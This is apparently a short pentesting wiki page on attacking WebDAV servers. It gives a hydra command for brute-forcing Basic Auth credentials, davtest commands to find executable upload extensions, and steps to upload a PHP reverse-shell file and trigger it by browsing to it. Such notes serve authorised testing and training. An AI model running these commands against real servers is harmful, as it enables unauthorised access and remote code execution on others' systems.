WebDAV
Pentesting WebDAV - TCP Ports 80,443
Theory
WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. Usually, to connect a WebDav server you will need valid credentials.
Practice
Brute-force (HTTP Basic Auth)
WebDAV usually require valid credentials using HTTP Basic Auth. You may bruteforce it using hydra
hydra -L users.txt -P passwords.txt example.domain.local http-get /webdavDirectory/
Upload a shell
Davtest will try to upload several files with different extensions and check if the extension is executed:
# Test and cleanup
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup
#Uplaod .txt files and try to move it to other extensions
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup -move
If we can upload the file e.g. PHP file, upload the script for reverse shell.
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php
Then we can navigate to http://example.com/davdir/shell.php to execute it.
Resources
Last updated
Was this helpful?